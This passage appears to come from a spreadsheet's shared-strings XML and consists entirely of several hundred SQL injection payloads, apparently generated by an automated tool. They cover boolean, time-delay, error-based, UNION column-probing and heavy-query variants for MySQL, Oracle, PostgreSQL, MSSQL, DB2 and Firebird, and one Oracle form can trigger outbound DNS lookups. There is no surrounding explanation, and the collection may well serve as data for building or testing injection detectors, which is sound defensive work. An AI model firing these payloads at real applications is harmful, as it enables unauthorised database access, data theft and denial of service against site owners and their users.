    <t>1"  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  "auyv" = "auyv</t>
  </si>
  <si>
    <t>1' where 8837 = 8837 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 'qpuy' = 'qpuy</t>
  </si>
  <si>
    <t>1 where 2267 = 2267 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as azak where 4911 = 4911</t>
  </si>
  <si>
    <t>-9509 )  union all select 1193,1193,1193#</t>
  </si>
  <si>
    <t>1%" and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and "%" = "</t>
  </si>
  <si>
    <t>-1370'  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( 'xmrg' = 'xmrg</t>
  </si>
  <si>
    <t>-1407 where 1186 = 1186 union all select 1186,1186,1186,1186,1186--</t>
  </si>
  <si>
    <t>-3062'  )  )   or 6872 = 6872 and   (  (  'uzth' like 'uzth</t>
  </si>
  <si>
    <t>1 )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>-1468'  )  )   )  or 4875 = 6163#</t>
  </si>
  <si>
    <t>1" where 4298 = 4298 order by 1--</t>
  </si>
  <si>
    <t>1"  )  )   as femc where 1313 = 1313 and 4595 = 4595#</t>
  </si>
  <si>
    <t>select * from generate_series ( 7536,7536,case when  ( 7536 = 7523 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( 9416 = 9416</t>
  </si>
  <si>
    <t>1'|| ( select 'ytwz' from dual where 3025 = 3025 and  ( 5039 = 5303 ) *5303 ) ||'</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t>1' in boolean mode )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  #</t>
  </si>
  <si>
    <t>-2951 or 4189 = 2291</t>
  </si>
  <si>
    <t>-1513" )  as swvd where 2958 = 2958 union all select 2958,2958,2958--</t>
  </si>
  <si>
    <t>1'+ ( select 'asmj' where 7808 = 7808 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5  )  )  +'</t>
  </si>
  <si>
    <t>select case when 3661 = 9315 then 1 else null end--</t>
  </si>
  <si>
    <t>1'  )  )   as qwdh where 7581 = 7581 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) #</t>
  </si>
  <si>
    <t>1' )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( 'gtov' like 'gtov</t>
  </si>
  <si>
    <t>1%" )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1"  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "ecoa" like "ecoa</t>
  </si>
  <si>
    <t>1"  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  "tbdl" like "tbdl</t>
  </si>
  <si>
    <t>-9050 union all select 9346,9346,9346,9346,9346,9346,9346,9346,9346,9346--</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 'bwka' = 'bwka</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 7533 = 7533 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-9997' union all select 9347,9347,9347,9347,9347,9347,9347,9347#</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and  ( 'gpqx' like 'gpqx</t>
  </si>
  <si>
    <t>1'|| ( select 'ymac' from dual where 9268 = 9268 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   ) ||'</t>
  </si>
  <si>
    <t>1%'  )  )   )  rlike  ( select  ( case when  ( 7697 = 3334 )  then 1 else 0x28 end  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( "sdps" = "sdps</t>
  </si>
  <si>
    <t>-1270'|| ( select 'mgdi' where 6785 = 6785 union all select 6785,6785#</t>
  </si>
  <si>
    <t>1' )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( 'xjvr' = 'xjvr</t>
  </si>
  <si>
    <t>1' )  where 2121 = 2121 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'+ ( select ijck where 9961 = 9961 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  +'</t>
  </si>
  <si>
    <t>1'  )  )   as peeo where 5356 = 5356 and elt ( 4722 = 2382,2382 ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  #</t>
  </si>
  <si>
    <t>1" and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "jgcv" = "jgcv</t>
  </si>
  <si>
    <t>-8519%'  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 )</t>
  </si>
  <si>
    <t>1 )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>-5043%'  )  )   )  union all select 5860,5860,5860,5860,5860#</t>
  </si>
  <si>
    <t>1' and make_set ( 8403 = 8403,8899 )  and 'lnwe' = 'lnwe</t>
  </si>
  <si>
    <t>1"  )  )   as riui where 2605 = 2605</t>
  </si>
  <si>
    <t>-3566' where 3641 = 3641 union all select 3641,3641,3641,3641,3641#</t>
  </si>
  <si>
    <t>1 and elt ( 2770 = 3669,3669 ) # sfls</t>
  </si>
  <si>
    <t>1'  )  )   as wuws where 6917 = 6917 union all select null#</t>
  </si>
  <si>
    <t>1'  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( 'llfp' = 'llfp</t>
  </si>
  <si>
    <t>1' )  where 8204 = 8204</t>
  </si>
  <si>
    <t>1"  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>-4970' )  union all select 4625,4625,4625,4625,4625,4625,4625,4625#</t>
  </si>
  <si>
    <t>-3805"  )  )   )  union all select 9123,9123,9123,9123,9123,9123,9123,9123#</t>
  </si>
  <si>
    <t>1  )  )   or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "gozk" = "gozk</t>
  </si>
  <si>
    <t>-5606  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'hfbt' where 7204 = 7204 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 )  as skby where 4269 = 4269 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>if ( 8264 = 1939 )  select 8264 else drop function nsoq--</t>
  </si>
  <si>
    <t>1'+ ( select enzd where 6046 = 6046 and  ( 3020 = 3020 ) *6703 ) +'</t>
  </si>
  <si>
    <t>-1479%' or 5201 = 3398--</t>
  </si>
  <si>
    <t>1'  )  )   as fqia where 1936 = 1936 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>1' )  as irnj where 7274 = 7274 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   )  and 4124 = 7245 and   (  (   ( "tuom" = "tuom</t>
  </si>
  <si>
    <t>1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and 'pbin' = 'pbin</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t>1' )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( 'yqmv' = 'yqmv</t>
  </si>
  <si>
    <t>1" where 7245 = 7245 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1' and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'blie' = 'blie</t>
  </si>
  <si>
    <t>1"  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "onhh" = "onhh</t>
  </si>
  <si>
    <t>1" )  as rdvm where 6360 = 6360 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( 'acml' like 'acml</t>
  </si>
  <si>
    <t>1' )  as nvqk where 3917 = 3917 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-3873%'  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 4638 = 8258,1,1/0 ) </t>
  </si>
  <si>
    <t>1' )  where 6056 = 6056 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'fbsr' where 7899 = 7899 and elt ( 4249 = 4249,7259  )  )  ||'</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'vixv' from dual where 7704 = 7704 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%'  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-4934" union all select 5119,5119,5119,5119,5119--</t>
  </si>
  <si>
    <t>1%' and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'boib' where 9595 = 9595</t>
  </si>
  <si>
    <t xml:space="preserve">-3462'  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t>-5278"  )  )   )  union all select 5264,5264,5264#</t>
  </si>
  <si>
    <t>1'  )  )   and 4242 = 5831 and   (  (  'xflh' like 'xflh</t>
  </si>
  <si>
    <t>1%" waitfor delay '0:0:5' and "%" = "</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  where 1502 = 1502 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>1 )  as obhj where 1789 = 1789 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>1 )  as hlit where 4973 = 4973 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1" )  as lrew where 6067 = 6067 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  where 9827 = 9827</t>
  </si>
  <si>
    <t>1' )  and 7533 = 7533 and  ( 'dbjq' = 'dbjq</t>
  </si>
  <si>
    <t>1%" )  rlike  ( select  ( case when  ( 7736 = 7642 )  then 1 else 0x28 end  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'xjtq' from dual where 5719 = 5719 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'ryom' where 1134 = 1134 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-2936 )  or 6872 = 6872</t>
  </si>
  <si>
    <t>1" where 8089 = 8089</t>
  </si>
  <si>
    <t>-7194'|| ( select 'gbrx' from dual where 6205 = 6205 union all select 6205,6205,6205,6205,6205,6205,6205#</t>
  </si>
  <si>
    <t>1" )  where 2180 = 2180 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'sbft' where 8748 = 8748</t>
  </si>
  <si>
    <t>select  ( case when  ( 5752 = 6036 )  then 1 else 5752* ( select 5752 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  as saqp where 6612 = 6612 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-1475" )  union all select 8611,8611,8611#</t>
  </si>
  <si>
    <t>1' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( 'eqfh' = 'eqfh</t>
  </si>
  <si>
    <t>select  ( case when  ( 7852 = 7476 )  then 7852 else 7852* ( select 7852 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  'xiyl' like 'xiyl</t>
  </si>
  <si>
    <t>1  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 6062 = 6062</t>
  </si>
  <si>
    <t>1"  )  )   and  ( 7467 = 7962 ) *7962 and   (  (  "nhld" = "nhld</t>
  </si>
  <si>
    <t>1" )  where 6236 = 6236 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1'  )  )   and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1 )  as ilqx where 8547 = 8547</t>
  </si>
  <si>
    <t>1 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) # bkjl</t>
  </si>
  <si>
    <t>1" )  where 2215 = 2215 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>1' )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( 'rgue' like 'rgue</t>
  </si>
  <si>
    <t>1'|| ( select 'hrpa' where 1973 = 1973 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' where 1153 = 1153 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>1" where 1132 = 1132 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-1084 where 1181 = 1181 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as tmpz where 7224 = 7224 and make_set ( 3579 = 1045,1045 ) --</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1  )  )   or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1  )  )   as jfae where 6684 = 6684 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1' )  as fxuk where 6184 = 6184 and make_set ( 9292 = 2785,2785 ) --</t>
  </si>
  <si>
    <t>-1134 union all select 1297,1297,1297,1297,1297,1297,1297,1297,1297--</t>
  </si>
  <si>
    <t>1  )  )   and 3249 = 2985</t>
  </si>
  <si>
    <t>1 where 9774 = 9774</t>
  </si>
  <si>
    <t>-1372%'  )  )   )  union all select 8403,8403,8403,8403#</t>
  </si>
  <si>
    <t>1' and 1661 = 1244 and 'dcha' = 'dcha</t>
  </si>
  <si>
    <t>1' )  where 2090 = 2090</t>
  </si>
  <si>
    <t>-3790" )  as ojgb where 5925 = 5925 union all select 5925,5925#</t>
  </si>
  <si>
    <t>1%'  )  )   and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-5539" )  union all select 6189,6189,6189,6189,6189,6189,6189,6189,6189--</t>
  </si>
  <si>
    <t>select  ( case when  ( 2717 = 2634 )  then 2717 else 2717* ( select 2717 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>-2423'  )  )   )  union all select 8256,8256,8256,8256,8256,8256,8256,8256--</t>
  </si>
  <si>
    <t>1  )  )   as uqsi where 1644 = 1644 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1" where 3692 = 3692 union all select null,null--</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>-5819%"  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||c</t>
  </si>
  <si>
    <t>-1760  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( 1541 = 1541</t>
  </si>
  <si>
    <t>1  )  )   and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1" )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( "thkh" like "thkh</t>
  </si>
  <si>
    <t>1%'  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'+ ( select 'rajp' where 3300 = 3300</t>
  </si>
  <si>
    <t>-7240'  )  )   union all select 8064,8064,8064#</t>
  </si>
  <si>
    <t>-1807'  )  )   union all select 9853,9853,9853,9853,9853,9853#</t>
  </si>
  <si>
    <t>-5187" )  union all select 3373,3373#</t>
  </si>
  <si>
    <t>1%'  )  )   )  waitfor delay '0:0:5' and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-5160' )  as kgjw where 9609 = 9609 union all select 9609,9609--</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( 'qvoy' = 'qvoy</t>
  </si>
  <si>
    <t>1'  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( "oiuw" = "oiuw</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null#</t>
  </si>
  <si>
    <t>1%' )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>-1218' union all select 2663,2663,2663,2663--</t>
  </si>
  <si>
    <t>1"  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( "dwcy" = "dwcy</t>
  </si>
  <si>
    <t>1'  )  )   as orvy where 7270 = 7270 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%" )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1" or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and "vwep" like "vwep</t>
  </si>
  <si>
    <t>1'  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  'miba' = 'miba</t>
  </si>
  <si>
    <t>-2625'  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>1' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'nxkp' like 'nxkp</t>
  </si>
  <si>
    <t>1 )  where 8164 = 8164 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'txyy' where 6500 = 6500 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1  )  )  ||'</t>
  </si>
  <si>
    <t>1%'  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'+ ( select 'zjvx' where 4683 = 4683 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  </t>
  </si>
  <si>
    <t>-4304' where 1005 = 1005 union all select 1005,1005#</t>
  </si>
  <si>
    <t>1%" )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'boxx' where 2038 = 2038 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1'+ ( select 'nmhy' where 2919 = 2919 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1 )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) </t>
  </si>
  <si>
    <t>1%" and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) </t>
  </si>
  <si>
